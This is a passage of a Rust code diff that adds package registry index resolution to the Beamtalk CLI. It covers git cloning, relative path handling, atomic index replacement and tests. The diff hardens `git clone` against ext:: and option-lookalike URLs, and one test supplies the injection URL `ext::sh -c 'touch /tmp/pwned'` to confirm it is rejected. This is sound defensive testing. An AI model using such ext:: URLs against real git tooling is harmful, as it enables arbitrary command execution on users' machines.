+    if index_dir.exists() {
+        let previous = index_dir.with_extension("previous");
+        let _ = std::fs::remove_dir_all(&previous);
+        std::fs::rename(index_dir, &previous)
+            .into_diagnostic()
+            .wrap_err_with(|| format!("Failed to move aside registry index '{index_dir}'"))?;
+        let result = std::fs::rename(staging_dir, index_dir)
+            .into_diagnostic()
+            .wrap_err_with(|| format!("Failed to install registry index at '{index_dir}'"));
+        if result.is_err() {
+            // Put the working index back rather than leaving nothing behind.
+            let _ = std::fs::rename(&previous, index_dir);
+            return result;
+        }
+        let _ = std::fs::remove_dir_all(&previous);
+        return Ok(());
+    }
+
+    std::fs::rename(staging_dir, index_dir)
+        .into_diagnostic()
+        .wrap_err_with(|| format!("Failed to install registry index at '{index_dir}'"))
 }
 
 /// Try to fast-forward an existing index clone. Returns `false` when the
@@ -278,23 +361,38 @@ fn fast_forward_index(index_dir: &Utf8Path) -> bool {
         .is_ok_and(|out| out.status.success())
 }
 
-/// Clone the registry index, replacing any existing directory.
-fn clone_index(url: &str, index_dir: &Utf8Path) -> Result<()> {
-    if index_dir.exists() {
-        std::fs::remove_dir_all(index_dir)
+/// Clone the registry index into `target`, replacing anything already there.
+fn clone_index(url: &str, target: &Utf8Path) -> Result<()> {
+    // The registry URL can come from the environment or the manifest; screen it
+    // with the same rules as a dependency URL so `ext::` and option-lookalikes
+    // can't reach `git clone`.
+    super::git::validate_git_url("<registry>", url)?;
+
+    if target.exists() {
+        std::fs::remove_dir_all(target)
             .into_diagnostic()
-            .wrap_err_with(|| format!("Failed to remove stale registry index '{index_dir}'"))?;
+            .wrap_err_with(|| format!("Failed to remove stale registry clone '{target}'"))?;
     }
 
-    if let Some(parent) = index_dir.parent() {
+    if let Some(parent) = target.parent() {
         std::fs::create_dir_all(parent)
             .into_diagnostic()
             .wrap_err_with(|| format!("Failed to create registry directory '{parent}'"))?;
     }
 
-    info!(url, %index_dir, "Cloning registry index");
+    info!(url, %target, "Cloning registry index");
     let output = Command::new("git")
-        .args(["clone", "--quiet", "--depth", "1", url, index_dir.as_str()])
+        .args([
+            "-c",
+            "protocol.ext.allow=never",
+            "clone",
+            "--quiet",
+            "--depth",
+            "1",
+            "--",
+            url,
+            target.as_str(),
+        ])
         .output()
         .into_diagnostic()
         .wrap_err("Failed to execute 'git clone' for the registry index")?;
@@ -546,9 +644,39 @@ tag = "release-0.2.1"
     }
 
     #[test]
-    fn test_parse_index_entry_rejects_unknown_fields() {
-        let content = "name = \"yaml\"\nbogus = true\n";
-        assert!(parse_index_entry("yaml", content).is_err());
+    fn test_parse_index_entry_accepts_unknown_fields() {
+        // The index is versioned independently of this binary: a future key
+        // must not break clients that predate it.
+        let content = r#"
+name = "yaml"
+yanked = false
+licenses = ["Apache-2.0"]
+
+[[versions]]
+version = "0.1.0"
+git = "https://example.test/yaml"
+checksum = "sha256:deadbeef"
+"#;
+        let entry = parse_index_entry("yaml", content).unwrap();
+        assert_eq!(entry.versions.len(), 1);
+        assert_eq!(entry.find_version("0.1.0").unwrap().tag, "v0.1.0");
+    }
+
+    #[test]
+    fn test_parse_index_entry_rejects_duplicate_versions() {
+        let content = r#"
+name = "yaml"
+
+[[versions]]
+version = "1.0.0"
+git = "https://example.test/yaml"
+
+[[versions]]
+version = "1.0.0"
+git = "https://evil.test/yaml"
+"#;
+        let err = parse_index_entry("yaml", content).unwrap_err();
+        assert!(flat_err(&err).contains("more than once"), "{err:?}");
     }
 
     #[test]
@@ -594,61 +722,90 @@ git = "g"
 
     // ── Location resolution ──────────────────────────────────────────
 
+    /// A project root that exists but contains no registry directory.
+    fn empty_root(dir: &TempDir) -> Utf8PathBuf {
+        utf8(dir)
+    }
+
     #[test]
     fn test_classify_location_existing_dir_is_local() {
         let dir = TempDir::new().unwrap();
         let root = utf8(&dir);
+        let project = TempDir::new().unwrap();
         assert_eq!(
-            classify_location(root.as_str()),
+            classify_location(&empty_root(&project), root.as_str()),
             RegistryLocation::LocalDir(root)
         );
     }
 
     #[test]
     fn test_classify_location_url_is_git() {
+        let project = TempDir::new().unwrap();
         assert_eq!(
-            classify_location("https://example.test/registry"),
+            classify_location(&empty_root(&project), "https://example.test/registry"),
             RegistryLocation::Git("https://example.test/registry".to_string())
         );
     }
 
     #[test]
-    fn test_location_falls_back_to_default() {
+    fn test_classify_location_relative_path_resolves_against_project_root() {
+        // Not the process cwd — the CLI, LSP and MCP servers all run with
+        // different working directories.
+        let project = TempDir::new().unwrap();
+        let root = utf8(&project);
+        std::fs::create_dir_all(root.join("vendor/registry/packages")).unwrap();
+
         assert_eq!(
-            resolve_registry_location_from(None, None),
+            classify_location(&root, "vendor/registry"),
+            RegistryLocation::LocalDir(root.join("vendor/registry"))
+        );
+    }
+
+    #[test]
+    fn test_location_falls_back_to_default() {
+        let project = TempDir::new().unwrap();
+        assert_eq!(
+            resolve_registry_location_from(&empty_root(&project), None, None),
             RegistryLocation::Git(DEFAULT_REGISTRY_URL.to_string())
         );
     }
 
     #[test]
     fn test_location_prefers_manifest_over_default() {
+        let project = TempDir::new().unwrap();
         let cfg = RegistryConfig {
             url: "https://example.test/custom".to_string(),
         };
         assert_eq!(
-            resolve_registry_location_from(None, Some(&cfg)),
+            resolve_registry_location_from(&empty_root(&project), None, Some(&cfg)),
             RegistryLocation::Git("https://example.test/custom".to_string())
         );
     }
 
     #[test]
     fn test_location_prefers_env_over_manifest() {
+        let project = TempDir::new().unwrap();
         let cfg = RegistryConfig {
             url: "https://example.test/from-manifest".to_string(),
         };
         assert_eq!(
-            resolve_registry_location_from(Some("https://example.test/from-env"), Some(&cfg)),
+            resolve_registry_location_from(
+                &empty_root(&project),
+                Some("https://example.test/from-env"),
+                Some(&cfg)
+            ),
             RegistryLocation::Git("https://example.test/from-env".to_string())
         );
     }
 
     #[test]
     fn test_location_ignores_blank_env() {
+        let project = TempDir::new().unwrap();
         let cfg = RegistryConfig {
             url: "https://example.test/from-manifest".to_string(),
         };
         assert_eq!(
-            resolve_registry_location_from(Some("   "), Some(&cfg)),
+            resolve_registry_location_from(&empty_root(&project), Some("   "), Some(&cfg)),
             RegistryLocation::Git("https://example.test/from-manifest".to_string())
         );
     }
@@ -666,6 +823,133 @@ git = "g"
         )
         .unwrap();
         assert_eq!(resolved, root);
+    }
+
+    // ── Git-backed index ─────────────────────────────────────────────
+    //
+    // Exercised through a local `file://` repository, so still network-free.
+
+    fn run_git(dir: &std::path::Path, args: &[&str]) {
+        let out = Command::new("git")
+            .args(args)
+            .current_dir(dir)
+            .output()
+            .unwrap();
+        assert!(
+            out.status.success(),
+            "git {args:?} failed: {}",
+            String::from_utf8_lossy(&out.stderr)
+        );
+    }
+
+    /// A git repository serving as a registry index. Returns the repo dir and
+    /// a `file://` URL for it.
+    fn make_git_index(entries: &[(&str, &str)]) -> (TempDir, String) {
+        let (dir, root) = make_index(entries);
+        let path = dir.path();
+        run_git(path, &["init"]);
+        run_git(path, &["config", "user.email", "t@t.com"]);
+        run_git(path, &["config", "user.name", "T"]);
+        run_git(path, &["config", "commit.gpgsign", "false"]);
+        run_git(path, &["add", "."]);
+        run_git(path, &["commit", "-m", "index"]);
+
+        let mut s = root.as_str().replace('\\', "/");
+        if !s.starts_with('/') {
+            s.insert(0, '/');
+        }
+        (dir, format!("file://{s}"))
+    }
+
+    #[test]
+    fn test_ensure_index_clones_git_registry() {
+        let (_repo, url) = make_git_index(&[("yaml", YAML_ENTRY)]);
+        let project = TempDir::new().unwrap();
+        let project_root = utf8(&project);
+
+        let index_root = ensure_index(&RegistryLocation::Git(url), &project_root, false).unwrap();
+
+        assert_eq!(
+            index_root,
+            BuildLayout::new(&project_root).registry_index_dir()
+        );
+        assert!(index_root.join("packages/yaml.toml").is_file());
+        assert_eq!(
+            read_entry(&index_root, "yaml").unwrap().unwrap().name,
+            "yaml"
+        );
+    }
+
+    #[test]
+    fn test_resolve_release_through_git_registry() {
+        let (_repo, url) = make_git_index(&[("yaml", YAML_ENTRY)]);
+        let project = TempDir::new().unwrap();
+        let location = RegistryLocation::Git(url);
+
+        let release = resolve_release(&utf8(&project), &location, "yaml", "0.2.1").unwrap();
+        assert_eq!(release.tag, "release-0.2.1");
+    }
+
+    /// A newly published version is picked up by the miss-then-refresh retry.
+    #[test]
+    fn test_resolve_release_refresh_picks_up_new_version() {
+        let (repo, url) = make_git_index(&[("yaml", YAML_ENTRY)]);
+        let project = TempDir::new().unwrap();
+        let project_root = utf8(&project);
+        let location = RegistryLocation::Git(url);
+
+        // Populate the local clone at the current index state.
+        resolve_release(&project_root, &location, "yaml", "0.2.1").unwrap();
+
+        // Publish 0.3.0 upstream.
+        let mut updated = YAML_ENTRY.to_string();
+        updated
+            .push_str("\n[[versions]]\nversion = \"0.3.0\"\ngit = \"https://example.test/yaml\"\n");
+        std::fs::write(repo.path().join("packages/yaml.toml"), updated).unwrap();
+        run_git(repo.path(), &["add", "."]);
+        run_git(repo.path(), &["commit", "-m", "publish 0.3.0"]);
+
+        let release = resolve_release(&project_root, &location, "yaml", "0.3.0").unwrap();
+        assert_eq!(release.version, "0.3.0");
+        assert_eq!(release.tag, "v0.3.0");
+    }
+
+    /// A refresh that cannot reach the remote must leave the working index
+    /// intact rather than deleting it and failing.
+    #[test]
+    fn test_failed_refresh_keeps_existing_index() {
+        let (repo, url) = make_git_index(&[("yaml", YAML_ENTRY)]);
+        let project = TempDir::new().unwrap();
+        let project_root = utf8(&project);
+        let location = RegistryLocation::Git(url);
+
+        resolve_release(&project_root, &location, "yaml", "0.2.1").unwrap();
+        let index_dir = BuildLayout::new(&project_root).registry_index_dir();
+        assert!(index_dir.join("packages/yaml.toml").is_file());
+
+        // Destroy the remote, then force a refresh via a lookup miss.
+        repo.close().unwrap();
+        let err = resolve_release(&project_root, &location, "yaml", "9.9.9").unwrap_err();
+
+        // The failure is about the missing version, not a broken registry, and
+        // the cached index survives for the next build.
+        assert!(flat_err(&err).contains("Available versions"), "{err:?}");
+        assert!(
+            index_dir.join("packages/yaml.toml").is_file(),
+            "a failed refresh must not delete the usable index"
+        );
+    }
+
+    #[test]
+    fn test_ensure_index_rejects_dangerous_registry_url() {
+        let project = TempDir::new().unwrap();
+        let err = ensure_index(
+            &RegistryLocation::Git("ext::sh -c 'touch /tmp/pwned'".to_string()),
+            &utf8(&project),
+            false,
+        )
+        .unwrap_err();
+        assert!(flat_err(&err).contains("unsupported git URL"), "{err:?}");
     }
 
     #[test]

--- a/crates/beamtalk-cli/src/commands/deps/registry.rs
+++ b/crates/beamtalk-cli/src/commands/deps/registry.rs
@@ -1,0 +1,760 @@
+// Copyright 2026 James Casey
+// SPDX-License-Identifier: Apache-2.0
+
+//! Package registry index resolution (BT-2978).
+//!
+//! **DDD Context:** Build System
+//!
+//! A registry dependency (`yaml = "0.2.1"` in `beamtalk.toml`) is resolved
+//! through a *registry index* into a `(git url, tag)` pair, which then flows
+//! through the existing git-dependency machinery unchanged.
+//!
+//! ## Index layout
+//!
+//! The index is a directory (typically a git repository) containing one TOML
+//! file per package under `packages/`:
+//!
+//! ```toml
+//! # packages/yaml.toml
+//! name = "yaml"
+//! description = "YAML parsing for Beamtalk"
+//!
+//! [[versions]]
+//! version = "0.2.1"
+//! git = "https://github.com/jamesc/beamtalk-yaml"
+//! tag = "v0.2.1"   # optional — defaults to "v{version}"
+//! ```
+//!
+//! ## Index location
+//!
+//! Resolved in priority order:
+//! 1. the `BEAMTALK_REGISTRY` environment variable
+//! 2. `[registry] url` in the project's `beamtalk.toml`
+//! 3. [`DEFAULT_REGISTRY_URL`]
+//!
+//! A value naming an existing local directory is read in place — no git, no
+//! network. Anything else is treated as a git URL and cloned into
+//! `_build/registry/index/`. The clone is refreshed only on a lookup miss
+//! (retried once) and by `beamtalk deps update`.
+
+use camino::{Utf8Path, Utf8PathBuf};
+use miette::{Context, IntoDiagnostic, Result};
+use serde::Deserialize;
+use std::cmp::Ordering;
+use std::process::Command;
+use tracing::{debug, info};
+
+use crate::commands::build_layout::BuildLayout;
+use crate::commands::manifest::RegistryConfig;
+
+/// The environment variable overriding the registry index location.
+pub const REGISTRY_ENV_VAR: &str = "BEAMTALK_REGISTRY";
+
+/// The registry index used when neither the environment nor the manifest
+/// selects one.
+pub const DEFAULT_REGISTRY_URL: &str = "https://github.com/jamesc/beamtalk-registry";
+
+/// Maximum number of names listed in a "not found" error before truncating.
+const MAX_LISTED: usize = 20;
+
+/// Where the registry index lives.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum RegistryLocation {
+    /// An existing local directory, read in place (no git, no network).
+    LocalDir(Utf8PathBuf),
+    /// A git URL, cloned/refreshed into `_build/registry/index/`.
+    Git(String),
+}
+
+impl std::fmt::Display for RegistryLocation {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::LocalDir(path) => write!(f, "{path}"),
+            Self::Git(url) => write!(f, "{url}"),
+        }
+    }
+}
+
+/// A single published release of a package, as recorded in the index.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct RegistryRelease {
+    /// The exact version (`major.minor.patch`).
+    pub version: String,
+    /// The git repository URL hosting this release.
+    pub git: String,
+    /// The git tag for this release (defaults to `v{version}` in the index).
+    pub tag: String,
+}
+
+/// A parsed index entry — one package and all of its published releases.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct RegistryEntry {
+    /// The package name.
+    pub name: String,
+    /// The package's human-readable description, if the index records one.
+    pub description: Option<String>,
+    /// All published releases, in the order the index lists them.
+    pub versions: Vec<RegistryRelease>,
+}
+
+impl RegistryEntry {
+    /// Find the release matching an exact version.
+    pub fn find_version(&self, version: &str) -> Option<&RegistryRelease> {
+        self.versions.iter().find(|r| r.version == version)
+    }
+
+    /// The highest published version, by numeric segment comparison.
+    ///
+    /// Returns `None` when the entry lists no releases.
+    pub fn latest_version(&self) -> Option<&RegistryRelease> {
+        self.versions
+            .iter()
+            .max_by(|a, b| compare_versions(&a.version, &b.version))
+    }
+}
+
+// ── Index entry TOML ─────────────────────────────────────────────────
+
+#[derive(Debug, Deserialize)]
+#[serde(deny_unknown_fields)]
+struct TomlIndexEntry {
+    name: String,
+    #[serde(default)]
+    description: Option<String>,
+    #[serde(default)]
+    versions: Vec<TomlIndexRelease>,
+}
+
+#[derive(Debug, Deserialize)]
+#[serde(deny_unknown_fields)]
+struct TomlIndexRelease {
+    version: String,
+    git: String,
+    #[serde(default)]
+    tag: Option<String>,
+}
+
+/// Parse an index entry from TOML text.
+///
+/// `expected_name` is the package name the file was looked up under; a
+/// mismatch against the entry's own `name` is an error, since it would
+/// silently resolve the wrong package.
+///
+/// # Errors
+///
+/// Returns an error if the TOML is malformed, carries unknown fields, or
+/// declares a name other than `expected_name`.
+pub fn parse_index_entry(expected_name: &str, content: &str) -> Result<RegistryEntry> {
+    let parsed: TomlIndexEntry = toml::from_str(content)
+        .into_diagnostic()
+        .wrap_err_with(|| format!("Invalid registry index entry for package '{expected_name}'"))?;
+
+    if parsed.name != expected_name {
+        miette::bail!(
+            "Registry index entry for '{expected_name}' declares a different package name '{}'.\n  \
+             The index is inconsistent — report this to the registry maintainer.",
+            parsed.name
+        );
+    }
+
+    let versions = parsed
+        .versions
+        .into_iter()
+        .map(|r| RegistryRelease {
+            tag: r.tag.unwrap_or_else(|| format!("v{}", r.version)),
+            version: r.version,
+            git: r.git,
+        })
+        .collect();
+
+    Ok(RegistryEntry {
+        name: parsed.name,
+        description: parsed.description,
+        versions,
+    })
+}
+
+// ── Location resolution ──────────────────────────────────────────────
+
+/// Determine where the registry index lives.
+///
+/// Priority: `BEAMTALK_REGISTRY` → `[registry] url` → [`DEFAULT_REGISTRY_URL`].
+/// A value naming an existing directory becomes [`RegistryLocation::LocalDir`];
+/// anything else is treated as a git URL.
+pub fn resolve_registry_location(registry: Option<&RegistryConfig>) -> RegistryLocation {
+    let env_value = std::env::var(REGISTRY_ENV_VAR).ok();
+    resolve_registry_location_from(env_value.as_deref(), registry)
+}
+
+/// The pure core of [`resolve_registry_location`], with the environment
+/// supplied by the caller so it can be exercised without mutating the
+/// process-wide environment.
+fn resolve_registry_location_from(
+    env_value: Option<&str>,
+    registry: Option<&RegistryConfig>,
+) -> RegistryLocation {
+    let raw = env_value
+        .filter(|v| !v.trim().is_empty())
+        .map(str::to_string)
+        .or_else(|| registry.map(|r| r.url.clone()))
+        .unwrap_or_else(|| DEFAULT_REGISTRY_URL.to_string());
+
+    classify_location(&raw)
+}
+
+/// Classify a raw registry location string as a local directory or a git URL.
+fn classify_location(raw: &str) -> RegistryLocation {
+    let candidate = Utf8Path::new(raw);
+    if candidate.is_dir() {
+        RegistryLocation::LocalDir(candidate.to_path_buf())
+    } else {
+        RegistryLocation::Git(raw.to_string())
+    }
+}
+
+// ── Index materialisation ────────────────────────────────────────────
+
+/// Ensure the registry index is available on disk and return its root
+/// directory (the one containing `packages/`).
+///
+/// A local-directory registry is returned as-is. A git registry is cloned into
+/// `_build/registry/index/` on first use; when `refresh` is set an existing
+/// clone is fast-forwarded (falling back to a fresh clone if that fails).
+///
+/// # Errors
+///
+/// Returns an error if the local directory has no `packages/` subdirectory, or
+/// if cloning the git registry fails.
+pub fn ensure_index(
+    location: &RegistryLocation,
+    project_root: &Utf8Path,
+    refresh: bool,
+) -> Result<Utf8PathBuf> {
+    match location {
+        RegistryLocation::LocalDir(dir) => {
+            let packages = dir.join("packages");
+            if !packages.is_dir() {
+                miette::bail!(
+                    "Registry '{dir}' is not a valid registry index — expected a 'packages' \
+                     directory at '{packages}'.\n\n  \
+                     Set {REGISTRY_ENV_VAR} or [registry] url in beamtalk.toml to a registry \
+                     index directory or git URL."
+                );
+            }
+            Ok(dir.clone())
+        }
+        RegistryLocation::Git(url) => ensure_git_index(url, project_root, refresh),
+    }
+}
+
+/// Clone or refresh the git registry index into `_build/registry/index/`.
+fn ensure_git_index(url: &str, project_root: &Utf8Path, refresh: bool) -> Result<Utf8PathBuf> {
+    let index_dir = BuildLayout::new(project_root).registry_index_dir();
+
+    if index_dir.join("packages").is_dir() {
+        if !refresh {
+            debug!(%index_dir, "Using existing registry index");
+            return Ok(index_dir);
+        }
+
+        info!(url, "Refreshing registry index");
+        if fast_forward_index(&index_dir) {
+            return Ok(index_dir);
+        }
+        debug!(%index_dir, "Fast-forward failed, re-cloning registry index");
+    }
+
+    clone_index(url, &index_dir)?;
+    Ok(index_dir)
+}
+
+/// Try to fast-forward an existing index clone. Returns `false` when the
+/// caller should fall back to a fresh clone.
+fn fast_forward_index(index_dir: &Utf8Path) -> bool {
+    Command::new("git")
+        .args(["pull", "--quiet", "--ff-only"])
+        .current_dir(index_dir)
+        .output()
+        .is_ok_and(|out| out.status.success())
+}
+
+/// Clone the registry index, replacing any existing directory.
+fn clone_index(url: &str, index_dir: &Utf8Path) -> Result<()> {
+    if index_dir.exists() {
+        std::fs::remove_dir_all(index_dir)
+            .into_diagnostic()
+            .wrap_err_with(|| format!("Failed to remove stale registry index '{index_dir}'"))?;
+    }
+
+    if let Some(parent) = index_dir.parent() {
+        std::fs::create_dir_all(parent)
+            .into_diagnostic()
+            .wrap_err_with(|| format!("Failed to create registry directory '{parent}'"))?;
+    }
+
+    info!(url, %index_dir, "Cloning registry index");
+    let output = Command::new("git")
+        .args(["clone", "--quiet", "--depth", "1", url, index_dir.as_str()])
+        .output()
+        .into_diagnostic()
+        .wrap_err("Failed to execute 'git clone' for the registry index")?;
+
+    if !output.status.success() {
+        let stderr = String::from_utf8_lossy(&output.stderr);
+        miette::bail!(
+            "Failed to clone the package registry from '{url}'\n\n\
+             git clone failed:\n{stderr}\n\n  \
+             Check the URL and your network connection, or point {REGISTRY_ENV_VAR} at a \
+             local registry index directory."
+        );
+    }
+
+    Ok(())
+}
+
+// ── Lookup ───────────────────────────────────────────────────────────
+
+/// Read a package's index entry.
+///
+/// Returns `Ok(None)` when the package has no entry in this index — a lookup
+/// miss the caller may retry after refreshing.
+///
+/// # Errors
+///
+/// Returns an error if the entry file exists but cannot be read or parsed.
+pub fn read_entry(index_root: &Utf8Path, name: &str) -> Result<Option<RegistryEntry>> {
+    // Package names are validated at manifest-parse time, but the name reaches
+    // the filesystem here — refuse anything that could escape `packages/`.
+    if name.is_empty() || name.contains(['/', '\\']) || name.contains("..") {
+        miette::bail!("Invalid registry package name '{name}'");
+    }
+
+    let entry_path = index_root.join("packages").join(format!("{name}.toml"));
+    if !entry_path.is_file() {
+        return Ok(None);
+    }
+
+    let content = std::fs::read_to_string(&entry_path)
+        .into_diagnostic()
+        .wrap_err_with(|| format!("Failed to read registry index entry '{entry_path}'"))?;
+
+    parse_index_entry(name, &content)
+        .wrap_err_with(|| format!("Failed to parse registry index entry '{entry_path}'"))
+        .map(Some)
+}
+
+/// Resolve a `(package, exact version)` pair to a `(git url, tag)` release.
+///
+/// Consults the index without touching the network first; on a miss (unknown
+/// package *or* unknown version) the index is refreshed once and the lookup
+/// retried, so a newly published version is picked up without a manual
+/// `deps update`.
+///
+/// # Errors
+///
+/// Returns an error if the index is unavailable, the package has no entry, or
+/// the requested version is not published. The error lists what *is*
+/// available.
+pub fn resolve_release(
+    project_root: &Utf8Path,
+    location: &RegistryLocation,
+    name: &str,
+    version: &str,
+) -> Result<RegistryRelease> {
+    // First attempt: whatever index is already on disk.
+    let index_root = ensure_index(location, project_root, false)?;
+    if let Some(entry) = read_entry(&index_root, name)? {
+        if let Some(release) = entry.find_version(version) {
+            return Ok(release.clone());
+        }
+    }
+
+    // Miss — refresh the index once and retry before failing.
+    debug!(
+        name,
+        version, "Registry lookup miss, refreshing index and retrying"
+    );
+    let index_root = ensure_index(location, project_root, true)?;
+    let entry = read_entry(&index_root, name)?;
+
+    let Some(entry) = entry else {
+        miette::bail!(
+            "Package '{name}' was not found in the registry ({location}).\n\n  \
+             {}\n\n  \
+             Check the spelling, or declare it as a git dependency:\n    \
+             {name} = {{ git = \"https://...\", tag = \"v{version}\" }}",
+            describe_available_packages(&index_root)
+        );
+    };
+
+    if let Some(release) = entry.find_version(version) {
+        return Ok(release.clone());
+    }
+
+    let available = if entry.versions.is_empty() {
+        "The registry lists no published versions for this package.".to_string()
+    } else {
+        let mut versions: Vec<&str> = entry.versions.iter().map(|r| r.version.as_str()).collect();
+        versions.sort_by(|a, b| compare_versions(b, a));
+        format!("Available versions: {}", truncated_list(&versions))
+    };
+
+    let latest_hint = entry.latest_version().map_or_else(String::new, |latest| {
+        format!(
+            "\n\n  The latest version is {}:\n    {name} = \"{}\"",
+            latest.version, latest.version
+        )
+    });
+
+    miette::bail!(
+        "Version '{version}' of package '{name}' was not found in the registry ({location}).\n\n  \
+         {available}{latest_hint}"
+    );
+}
+
+/// Describe which packages the index does contain, for a not-found error.
+fn describe_available_packages(index_root: &Utf8Path) -> String {
+    let mut names = Vec::new();
+    if let Ok(entries) = std::fs::read_dir(index_root.join("packages")) {
+        for entry in entries.flatten() {
+            let path = entry.path();
+            if path.extension().is_some_and(|e| e == "toml") {
+                if let Some(stem) = path.file_stem().and_then(|s| s.to_str()) {
+                    names.push(stem.to_string());
+                }
+            }
+        }
+    }
+
+    if names.is_empty() {
+        return "The registry index contains no packages.".to_string();
+    }
+
+    names.sort();
+    let refs: Vec<&str> = names.iter().map(String::as_str).collect();
+    format!("Packages in the registry: {}", truncated_list(&refs))
+}
+
+/// Join a list for display, truncating past [`MAX_LISTED`] entries.
+fn truncated_list(items: &[&str]) -> String {
+    if items.len() <= MAX_LISTED {
+        return items.join(", ");
+    }
+    format!(
+        "{}, ... ({} more)",
+        items[..MAX_LISTED].join(", "),
+        items.len() - MAX_LISTED
+    )
+}
+
+// ── Version ordering ─────────────────────────────────────────────────
+
+/// Compare two version strings by numeric segments.
+///
+/// Segments are compared as integers, so `0.10.0` sorts above `0.9.1` (which a
+/// lexicographic comparison would get wrong). Missing trailing segments count
+/// as zero, and any non-numeric segment compares as zero — the manifest parser
+/// already rejects non-numeric versions, so this only affects malformed index
+/// entries, which sort low rather than panicking.
+pub fn compare_versions(a: &str, b: &str) -> Ordering {
+    let mut left = a.split('.');
+    let mut right = b.split('.');
+
+    loop {
+        match (left.next(), right.next()) {
+            (None, None) => return Ordering::Equal,
+            (l, r) => {
+                let lv = l.and_then(|s| s.parse::<u64>().ok()).unwrap_or(0);
+                let rv = r.and_then(|s| s.parse::<u64>().ok()).unwrap_or(0);
+                match lv.cmp(&rv) {
+                    Ordering::Equal => {}
+                    other => return other,
+                }
+            }
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use tempfile::TempDir;
+
+    fn utf8(dir: &TempDir) -> Utf8PathBuf {
+        Utf8PathBuf::from_path_buf(dir.path().to_path_buf()).unwrap()
+    }
+
+    /// Render an error as a single line — miette's `Debug` output hard-wraps
+    /// to the terminal width, which would otherwise break phrase assertions.
+    fn flat_err(err: &miette::Report) -> String {
+        format!("{err:?}")
+            .split_whitespace()
+            .collect::<Vec<_>>()
+            .join(" ")
+    }
+
+    /// Build a local registry index directory with the given package files.
+    fn make_index(entries: &[(&str, &str)]) -> (TempDir, Utf8PathBuf) {
+        let dir = TempDir::new().unwrap();
+        let root = utf8(&dir);
+        std::fs::create_dir_all(root.join("packages")).unwrap();
+        for (name, content) in entries {
+            std::fs::write(root.join("packages").join(format!("{name}.toml")), content).unwrap();
+        }
+        (dir, root)
+    }
+
+    const YAML_ENTRY: &str = r#"
+name = "yaml"
+description = "YAML parsing for Beamtalk"
+
+[[versions]]
+version = "0.1.0"
+git = "https://example.test/yaml"
+
+[[versions]]
+version = "0.2.1"
+git = "https://example.test/yaml"
+tag = "release-0.2.1"
+"#;
+
+    // ── Entry parsing ────────────────────────────────────────────────
+
+    #[test]
+    fn test_parse_index_entry_with_explicit_tag() {
+        let entry = parse_index_entry("yaml", YAML_ENTRY).unwrap();
+        assert_eq!(entry.name, "yaml");
+        assert_eq!(
+            entry.description.as_deref(),
+            Some("YAML parsing for Beamtalk")
+        );
+        assert_eq!(entry.versions.len(), 2);
+        assert_eq!(entry.find_version("0.2.1").unwrap().tag, "release-0.2.1");
+    }
+
+    #[test]
+    fn test_parse_index_entry_tag_defaults_to_v_prefix() {
+        let entry = parse_index_entry("yaml", YAML_ENTRY).unwrap();
+        assert_eq!(entry.find_version("0.1.0").unwrap().tag, "v0.1.0");
+    }
+
+    #[test]
+    fn test_parse_index_entry_rejects_name_mismatch() {
+        let err = parse_index_entry("json", YAML_ENTRY).unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("different package name"), "{msg}");
+    }
+
+    #[test]
+    fn test_parse_index_entry_rejects_unknown_fields() {
+        let content = "name = \"yaml\"\nbogus = true\n";
+        assert!(parse_index_entry("yaml", content).is_err());
+    }
+
+    #[test]
+    fn test_parse_index_entry_with_no_versions() {
+        let entry = parse_index_entry("yaml", "name = \"yaml\"\n").unwrap();
+        assert!(entry.versions.is_empty());
+        assert!(entry.latest_version().is_none());
+    }
+
+    // ── Version ordering ─────────────────────────────────────────────
+
+    #[test]
+    fn test_compare_versions_numeric_not_lexicographic() {
+        assert_eq!(compare_versions("0.10.0", "0.9.1"), Ordering::Greater);
+        assert_eq!(compare_versions("0.9.1", "0.10.0"), Ordering::Less);
+        assert_eq!(compare_versions("1.0.0", "1.0.0"), Ordering::Equal);
+        assert_eq!(compare_versions("2.0.0", "1.99.99"), Ordering::Greater);
+    }
+
+    #[test]
+    fn test_compare_versions_missing_segments_are_zero() {
+        assert_eq!(compare_versions("1.0", "1.0.0"), Ordering::Equal);
+        assert_eq!(compare_versions("1.0", "1.0.1"), Ordering::Less);
+    }
+
+    #[test]
+    fn test_latest_version_picks_highest_numeric() {
+        let content = r#"
+name = "p"
+[[versions]]
+version = "0.9.1"
+git = "g"
+[[versions]]
+version = "0.10.0"
+git = "g"
+[[versions]]
+version = "0.2.0"
+git = "g"
+"#;
+        let entry = parse_index_entry("p", content).unwrap();
+        assert_eq!(entry.latest_version().unwrap().version, "0.10.0");
+    }
+
+    // ── Location resolution ──────────────────────────────────────────
+
+    #[test]
+    fn test_classify_location_existing_dir_is_local() {
+        let dir = TempDir::new().unwrap();
+        let root = utf8(&dir);
+        assert_eq!(
+            classify_location(root.as_str()),
+            RegistryLocation::LocalDir(root)
+        );
+    }
+
+    #[test]
+    fn test_classify_location_url_is_git() {
+        assert_eq!(
+            classify_location("https://example.test/registry"),
+            RegistryLocation::Git("https://example.test/registry".to_string())
+        );
+    }
+
+    #[test]
+    fn test_location_falls_back_to_default() {
+        assert_eq!(
+            resolve_registry_location_from(None, None),
+            RegistryLocation::Git(DEFAULT_REGISTRY_URL.to_string())
+        );
+    }
+
+    #[test]
+    fn test_location_prefers_manifest_over_default() {
+        let cfg = RegistryConfig {
+            url: "https://example.test/custom".to_string(),
+        };
+        assert_eq!(
+            resolve_registry_location_from(None, Some(&cfg)),
+            RegistryLocation::Git("https://example.test/custom".to_string())
+        );
+    }
+
+    #[test]
+    fn test_location_prefers_env_over_manifest() {
+        let cfg = RegistryConfig {
+            url: "https://example.test/from-manifest".to_string(),
+        };
+        assert_eq!(
+            resolve_registry_location_from(Some("https://example.test/from-env"), Some(&cfg)),
+            RegistryLocation::Git("https://example.test/from-env".to_string())
+        );
+    }
+
+    #[test]
+    fn test_location_ignores_blank_env() {
+        let cfg = RegistryConfig {
+            url: "https://example.test/from-manifest".to_string(),
+        };
+        assert_eq!(
+            resolve_registry_location_from(Some("   "), Some(&cfg)),
+            RegistryLocation::Git("https://example.test/from-manifest".to_string())
+        );
+    }
+
+    // ── ensure_index ─────────────────────────────────────────────────
+
+    #[test]
+    fn test_ensure_index_local_dir_passthrough() {
+        let (_dir, root) = make_index(&[("yaml", YAML_ENTRY)]);
+        let project = TempDir::new().unwrap();
